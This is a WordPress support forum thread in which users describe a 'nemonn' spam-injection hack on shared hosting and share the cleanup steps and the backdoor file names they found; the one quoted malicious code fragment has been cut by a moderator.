WordPress.org

Ready to get started?Download WordPress

Forums

[closed] Site hacked - nemonn tag infected with scam description (23 posts)

  1. danihunt
    Member
    Posted 2 years ago #

    Hi & thank you for your help. I understand basic html & css but am no guru so please keep it simple if possible :)

    I have 2 sites running on wordpress... frances-hunt.com & danihunt.com. They are on the same server. Both sites have been hacked. Basically, a 'nemonn' tag has been added, with scam text about money loaning. This is now showing up as the site description when I post to sites like Facebook. I'm eager to get rid of it!

    If you visit the sites and click 'view source' you can see the problem half way down. I have opened up every file I can in search of the text but can't find it anywhere to delete it. How can I find it and remove it?

    Just a quick note too that I went to great length to make the log-in secure, installing wp-admin in a secondary folder and creating secure passwords, so I think this code was added without hacking in using logins and passwords. Any idea how I can prevent it in the future?

    Thank you so much for your time and brains! Dani.

  2. WPyogi
    Forum Moderator
    Posted 2 years ago #

  3. kennyknapp
    Member
    Posted 2 years ago #

    just wanted to chime in and say I was having the same problem. still working on a solution.

  4. @danihunt and @kennyknapp:

    It probably has a lot to do with GoDaddy. Shared hosts can allow hack vectors from other insecure shared accounts on the same server. GoDaddy is not generally considered to be a secure host.

  5. kennyknapp
    Member
    Posted 2 years ago #

    fixed it:

    Looks like the spam-bot (or whatever) added the code to the header.php file of the active theme. It was no big deal to remove everything between the tags: <!--start-add-div-content--> and <!--end-add-div-content--> right before the <body> tag.

    @songdogtech - yep, shared hosting can be a treacherous place but, to my knowledge, my client's site is not hosted on GoDaddy or anywhere in their upstream (WildWestDomains, etc.); just fyi.

  6. @kennyknapp: @danihunt is on GoDaddy. And "WildWestDomains" sounds about as reliable as GoDaddy. If you only removed that spam link, you haven't done a complete job of cleaning the hack.

  7. kennyknapp
    Member
    Posted 2 years ago #

    @songdogtech: after removing the injected code, there doesn't appear to be any residual problem in any theme functions.php file and I've also re-installed the WP 3.4.2 files. We're going to follow the additional recommendations at http://codex.wordpress.org/FAQ_My_site_was_hacked. What other resources do you advise for securing a WP installation?

  8. Read the standard links that we all recommend, like WPyogi posted above.

  9. Bev
    Member
    Posted 2 years ago #

    I got this hack as well with Netfirms hosting.

  10. WPyogi
    Forum Moderator
    Posted 2 years ago #

    Same advice applies -- hacks are not always limited to one host by any means, though it's common for them to affect multiple sites on shared servers.

  11. Bev
    Member
    Posted 2 years ago #

    More info on this hack can be found here: http://wordpress.org/support/topic/hackedmalware-need-help-please

  12. GranPaSmurf
    Member
    Posted 2 years ago #

    Me too. I have about a dozen sites on GoDaddy. I thought they were pretty reliable at preventing cross server hacks. I guess I got the wrong memo.
    The hacked site has the 'nemonn' verbage. I can't tell if it's a phishing site, but makes no diff, I need to cure it. I am working through the instructions posted here, so far the scanners are not catching it.
    I am confounded by Secret Security Keys. Never heard of them and don't yet know what to do about them.

  13. willt87
    Member
    Posted 2 years ago #

    A client of mine was hacked with 'neonmm' in recent days on GoDaddy hosting.

    I found a base64_decode file called upgrade-merrili-janean.php in the core wp-admin directory, which I'm pretty sure is connected.

    Hope this helps someone.

  14. willt87
    Member
    Posted 2 years ago #

    This is what I have found out about "nemonn"

    Just removing the obfuscated javascript from the header will not work permanently.

    There will be an additional base64 coded file elsewhere (the backdoor)- and possibly more than one. They seem to be located in the core wp-admin directory and are randomly named but seem to follow the update-randomname-randomname.php taxonomy.

    Just updating / reinstalling WordPress from the admin won't remove this file.

    Additionally you should follow guidance given elsewhere for changing ALL passwords (FTP, database and WordPress admins) and follow instructions for Hardening WordPress.

  15. @willt87 said:

    Just removing the obfuscated javascript from the header will not work permanently.

    Yes, one needs to read all the links posted by @WPyogi above to completely clean the hack.

  16. Bev
    Member
    Posted 2 years ago #

    FWIW - my base64 backdoor was named weather-de.php and was found under "plugins".

  17. sitenorth
    Member
    Posted 2 years ago #

    Just found this on 2 sites (on a server with maybe 8 installs, and it is godaddy host if that matters).

    Domain A, 3 php files found in WP-ADMIN
    class-dierdre-gregory.php
    class-ftp-vivian-cry.php
    theme-sybyl-agree.php

    Domain B, 1 php file found in WP-ADMIN/IMAGES
    arrows-babb-gateau.php

    Both sites have a google cache from Dec 6th and were clean, nothing was added/removed to these sites EXCEPT the 3.5 WP update this week.

    Removed said php files, and input added to header, now to go do a full clean and search.

  18. aguidaequesabe
    Member
    Posted 2 years ago #

    I don't know if it helps, but I had/have the same problem and found these:

    wp-admin > images > menu-bits-fraught-reprise.php
    wp-admin > instal-ranging-pummel.php
    wp-includes > class-skill-indemnify.php

    (I seriously hope I didn't delete anything I shouldn't, I'm a newbie)

    This appeared one or two weeks ago, before the 3.5 WP update, on Godaddy host.

  19. masonictraveler
    Member
    Posted 2 years ago #

    Had this same problem a week or so back. the intrusion/hack came in through a compromised plugin, G-Translate plugin (this one WP Translate 4.0.1 if memory serves http://wordpress.org/extend/plugins/wp-translate/).

    It was tough to find and I couldn't see it in the theme editor (it had dropped the text and link URL into the head, just above the content. The only real reason I found it was because they had forgotten to close the font size tag and it overrode my entire theme, telling me there was an issue.

    Ended up going through my host who checked my account and found the intrusion.

    Long story short, exploited plugin.

  20. kledoux
    Member
    Posted 2 years ago #

    I found 3 base64 files on each of my sites that were hacked. (3 sites)
    All with names similar to aguidaequesabe. All were on GoDaddy as well.
    In addition to the code inserted into the header file, I found several "index.php" files around that had the following eval code inserted

    function gpc_15674($l15676){i [code moderated] rray_map("gpc_15674",$_SERVER);

  21. jwurster
    Member
    Posted 2 years ago #

  22. sitenorth
    Member
    Posted 2 years ago #

    This hack returned this week to our sites.

    All extra files were removed, we were 100% clean, yet it's back again.

    Hosted at godaddy.

  23. esmi
    Forum Moderator
    Posted 2 years ago #

    @sitenorth: As per the Forum Welcome, please post your own topic. Posting in an existing topic prevents us from being able to track issues by topic. Added to which, your problem - despite any similarity in symptoms - is likely to be completely different.

Topic Closed

This topic has been closed to new replies.

About this Topic